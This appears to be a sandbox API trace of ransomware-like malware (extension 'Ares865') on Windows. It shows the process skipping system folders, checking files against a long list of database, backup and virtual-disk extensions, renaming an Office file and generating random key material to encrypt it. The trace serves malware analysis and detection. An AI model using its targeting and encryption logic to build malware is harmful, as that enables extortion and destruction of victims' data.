[0087.577] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="windows") returned -1 [0087.577] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="bootmgr") returned 1 [0087.577] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="temp") returned -1 [0087.577] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="pagefile.sys") returned -1 [0087.577] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="boot") returned 1 [0087.577] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="ids.txt") returned 1 [0087.577] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="ntuser.dat") returned -1 [0087.577] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="perflogs") returned -1 [0087.577] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="MSBuild") returned -1 [0087.578] lstrlenW (lpString="MOR6INT.REST.trx_dll") returned 20 [0087.578] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll") returned 69 [0087.578] lstrcpyW (in: lpString1=0x2cce468, lpString2="MOR6INT.REST.trx_dll" | out: lpString1="MOR6INT.REST.trx_dll") returned="MOR6INT.REST.trx_dll" [0087.578] lstrlenW (lpString="MOR6INT.REST.trx_dll") returned 20 [0087.578] lstrlenW (lpString="Ares865") returned 7 [0087.578] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.578] lstrlenW (lpString=".dll") returned 4 [0087.578] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2=".dll") returned 1 [0087.578] lstrlenW (lpString=".lnk") returned 4 [0087.578] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2=".lnk") returned 1 [0087.578] lstrlenW (lpString=".ini") returned 4 [0087.578] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2=".ini") returned 1 [0087.578] lstrlenW (lpString=".sys") returned 4 [0087.578] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2=".sys") returned 1 [0087.578] lstrlenW (lpString="MOR6INT.REST.trx_dll") returned 20 [0087.578] lstrlenW (lpString="bak") returned 3 [0087.578] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.578] lstrlenW (lpString="ba_") returned 3 [0087.578] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.578] lstrlenW (lpString="dbb") returned 3 [0087.578] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.578] lstrlenW (lpString="vmdk") returned 4 [0087.578] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.578] lstrlenW (lpString="rar") returned 3 [0087.578] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.578] lstrlenW (lpString="zip") returned 3 [0087.578] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.578] lstrlenW (lpString="tgz") returned 3 [0087.578] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.578] lstrlenW (lpString="vbox") returned 4 [0087.578] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.578] lstrlenW (lpString="vdi") returned 3 [0087.578] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.578] lstrlenW (lpString="vhd") returned 3 [0087.578] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.578] lstrlenW (lpString="vhdx") returned 4 [0087.578] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.578] lstrlenW (lpString="avhd") returned 4 [0087.579] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.579] lstrlenW (lpString="db") returned 2 [0087.579] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.579] lstrlenW (lpString="db2") returned 3 [0087.579] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.579] lstrlenW (lpString="db3") returned 3 [0087.579] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.579] lstrlenW (lpString="dbf") returned 3 [0087.579] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.579] lstrlenW (lpString="mdf") returned 3 [0087.579] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.579] lstrlenW (lpString="mdb") returned 3 [0087.579] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.579] lstrlenW (lpString="sql") returned 3 [0087.579] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.579] lstrlenW (lpString="sqlite") returned 6 [0087.579] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.579] lstrlenW (lpString="sqlite3") returned 7 [0087.579] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.579] lstrlenW (lpString="sqlitedb") returned 8 [0087.579] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.579] lstrlenW (lpString="xml") returned 3 [0087.579] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.579] lstrlenW (lpString="$er") returned 3 [0087.579] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.579] lstrlenW (lpString="4dd") returned 3 [0087.579] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.579] lstrlenW (lpString="4dl") returned 3 [0087.579] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.579] lstrlenW (lpString="^^^") returned 3 [0087.579] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.579] lstrlenW (lpString="abs") returned 3 [0087.579] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0087.579] lstrlenW (lpString="abx") returned 3 [0087.579] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.579] lstrlenW (lpString="accdb") returned 5 [0087.579] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.579] lstrlenW (lpString="accdc") returned 5 [0087.580] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.580] lstrlenW (lpString="accde") returned 5 [0087.580] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.580] lstrlenW (lpString="accdr") returned 5 [0087.580] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.580] lstrlenW (lpString="accdt") returned 5 [0087.580] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.580] lstrlenW (lpString="accdw") returned 5 [0087.580] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.580] lstrlenW (lpString="accft") returned 5 [0087.580] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.580] lstrlenW (lpString="adb") returned 3 [0087.580] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.580] lstrlenW (lpString="adb") returned 3 [0087.580] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.580] lstrlenW (lpString="ade") returned 3 [0087.580] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.580] lstrlenW (lpString="adf") returned 3 [0087.580] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.580] lstrlenW (lpString="adn") returned 3 [0087.580] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.580] lstrlenW (lpString="adp") returned 3 [0087.580] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0087.580] lstrlenW (lpString="alf") returned 3 [0087.580] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.580] lstrlenW (lpString="ask") returned 3 [0087.580] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.580] lstrlenW (lpString="btr") returned 3 [0087.580] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.580] lstrlenW (lpString="cat") returned 3 [0087.580] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.580] lstrlenW (lpString="cdb") returned 3 [0087.580] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.580] lstrlenW (lpString="ckp") returned 3 [0087.580] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.580] lstrlenW (lpString="cma") returned 3 [0087.580] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.580] lstrlenW (lpString="cpd") returned 3 [0087.581] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.581] lstrlenW (lpString="dacpac") returned 6 [0087.581] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.581] lstrlenW (lpString="dad") returned 3 [0087.581] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.581] lstrlenW (lpString="dadiagrams") returned 10 [0087.581] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0087.581] lstrlenW (lpString="daschema") returned 8 [0087.581] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.581] lstrlenW (lpString="db-journal") returned 10 [0087.581] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0087.581] lstrlenW (lpString="db-shm") returned 6 [0087.581] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.581] lstrlenW (lpString="db-wal") returned 6 [0087.581] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.581] lstrlenW (lpString="dbc") returned 3 [0087.581] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.581] lstrlenW (lpString="dbs") returned 3 [0087.581] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.581] lstrlenW (lpString="dbt") returned 3 [0087.581] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.581] lstrlenW (lpString="dbv") returned 3 [0087.581] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.581] lstrlenW (lpString="dbx") returned 3 [0087.581] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.581] lstrlenW (lpString="dcb") returned 3 [0087.581] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.581] lstrlenW (lpString="dct") returned 3 [0087.581] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.581] lstrlenW (lpString="dcx") returned 3 [0087.581] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.581] lstrlenW (lpString="ddl") returned 3 [0087.581] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.581] lstrlenW (lpString="dlis") returned 4 [0087.581] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.581] lstrlenW (lpString="dp1") returned 3 [0087.581] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.581] lstrlenW (lpString="dqy") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.582] lstrlenW (lpString="dsk") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.582] lstrlenW (lpString="dsn") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.582] lstrlenW (lpString="dtsx") returned 4 [0087.582] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.582] lstrlenW (lpString="dxl") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.582] lstrlenW (lpString="eco") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.582] lstrlenW (lpString="ecx") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.582] lstrlenW (lpString="edb") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.582] lstrlenW (lpString="epim") returned 4 [0087.582] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.582] lstrlenW (lpString="fcd") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.582] lstrlenW (lpString="fdb") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.582] lstrlenW (lpString="fic") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.582] lstrlenW (lpString="flexolibrary") returned 12 [0087.582] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0087.582] lstrlenW (lpString="fm5") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.582] lstrlenW (lpString="fmp") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.582] lstrlenW (lpString="fmp12") returned 5 [0087.582] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.582] lstrlenW (lpString="fmpsl") returned 5 [0087.582] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.582] lstrlenW (lpString="fol") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.582] lstrlenW (lpString="fp3") returned 3 [0087.582] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.582] lstrlenW (lpString="fp4") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.583] lstrlenW (lpString="fp5") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.583] lstrlenW (lpString="fp7") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.583] lstrlenW (lpString="fpt") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.583] lstrlenW (lpString="frm") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.583] lstrlenW (lpString="gdb") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.583] lstrlenW (lpString="gdb") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.583] lstrlenW (lpString="grdb") returned 4 [0087.583] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.583] lstrlenW (lpString="gwi") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.583] lstrlenW (lpString="hdb") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.583] lstrlenW (lpString="his") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.583] lstrlenW (lpString="ib") returned 2 [0087.583] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.583] lstrlenW (lpString="idb") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.583] lstrlenW (lpString="ihx") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.583] lstrlenW (lpString="itdb") returned 4 [0087.583] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.583] lstrlenW (lpString="itw") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.583] lstrlenW (lpString="jet") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.583] lstrlenW (lpString="jtx") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.583] lstrlenW (lpString="kdb") returned 3 [0087.583] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.583] lstrlenW (lpString="kexi") returned 4 [0087.583] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.584] lstrlenW (lpString="kexic") returned 5 [0087.584] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.584] lstrlenW (lpString="kexis") returned 5 [0087.584] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.584] lstrlenW (lpString="lgc") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.584] lstrlenW (lpString="lwx") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.584] lstrlenW (lpString="maf") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0087.584] lstrlenW (lpString="maq") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.584] lstrlenW (lpString="mar") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.584] lstrlenW (lpString="marshal") returned 7 [0087.584] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.584] lstrlenW (lpString="mas") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.584] lstrlenW (lpString="mav") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.584] lstrlenW (lpString="maw") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.584] lstrlenW (lpString="mdbhtml") returned 7 [0087.584] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.584] lstrlenW (lpString="mdn") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.584] lstrlenW (lpString="mdt") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.584] lstrlenW (lpString="mfd") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.584] lstrlenW (lpString="mpd") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.584] lstrlenW (lpString="mrg") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.584] lstrlenW (lpString="mud") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0087.584] lstrlenW (lpString="mwb") returned 3 [0087.584] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.585] lstrlenW (lpString="myd") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.585] lstrlenW (lpString="ndf") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.585] lstrlenW (lpString="nnt") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.585] lstrlenW (lpString="nrmlib") returned 6 [0087.585] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.585] lstrlenW (lpString="ns2") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.585] lstrlenW (lpString="ns3") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.585] lstrlenW (lpString="ns4") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.585] lstrlenW (lpString="nsf") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.585] lstrlenW (lpString="nv") returned 2 [0087.585] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.585] lstrlenW (lpString="nv2") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.585] lstrlenW (lpString="nwdb") returned 4 [0087.585] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.585] lstrlenW (lpString="nyf") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0087.585] lstrlenW (lpString="odb") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.585] lstrlenW (lpString="odb") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.585] lstrlenW (lpString="oqy") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.585] lstrlenW (lpString="ora") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.585] lstrlenW (lpString="orx") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.585] lstrlenW (lpString="owc") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.585] lstrlenW (lpString="p96") returned 3 [0087.585] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.586] lstrlenW (lpString="p97") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.586] lstrlenW (lpString="pan") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.586] lstrlenW (lpString="pdb") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.586] lstrlenW (lpString="pdm") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.586] lstrlenW (lpString="pnz") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.586] lstrlenW (lpString="qry") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.586] lstrlenW (lpString="qvd") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.586] lstrlenW (lpString="rbf") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.586] lstrlenW (lpString="rctd") returned 4 [0087.586] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.586] lstrlenW (lpString="rod") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.586] lstrlenW (lpString="rodx") returned 4 [0087.586] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.586] lstrlenW (lpString="rpd") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.586] lstrlenW (lpString="rsd") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.586] lstrlenW (lpString="sas7bdat") returned 8 [0087.586] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.586] lstrlenW (lpString="sbf") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.586] lstrlenW (lpString="scx") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.586] lstrlenW (lpString="sdb") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.586] lstrlenW (lpString="sdc") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.586] lstrlenW (lpString="sdf") returned 3 [0087.586] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.587] lstrlenW (lpString="sis") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.587] lstrlenW (lpString="spq") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.587] lstrlenW (lpString="te") returned 2 [0087.587] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0087.587] lstrlenW (lpString="teacher") returned 7 [0087.587] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.587] lstrlenW (lpString="tmd") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.587] lstrlenW (lpString="tps") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.587] lstrlenW (lpString="trc") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.587] lstrlenW (lpString="trc") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.587] lstrlenW (lpString="trm") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.587] lstrlenW (lpString="udb") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.587] lstrlenW (lpString="udl") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.587] lstrlenW (lpString="usr") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.587] lstrlenW (lpString="v12") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.587] lstrlenW (lpString="vis") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.587] lstrlenW (lpString="vpd") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.587] lstrlenW (lpString="vvv") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.587] lstrlenW (lpString="wdb") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.587] lstrlenW (lpString="wmdb") returned 4 [0087.587] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.587] lstrlenW (lpString="wrk") returned 3 [0087.587] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.588] lstrlenW (lpString="xdb") returned 3 [0087.588] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.588] lstrlenW (lpString="xld") returned 3 [0087.588] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.588] lstrlenW (lpString="xmlff") returned 5 [0087.588] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.588] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.Ares865") returned 80 [0087.588] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.596] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.596] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49504) returned 1 [0087.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.597] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.597] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.597] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.598] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc460, lpName=0x0) returned 0x15c [0087.599] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc460) returned 0x190000 [0087.602] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.603] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.603] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0087.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0087.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.603] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0087.604] 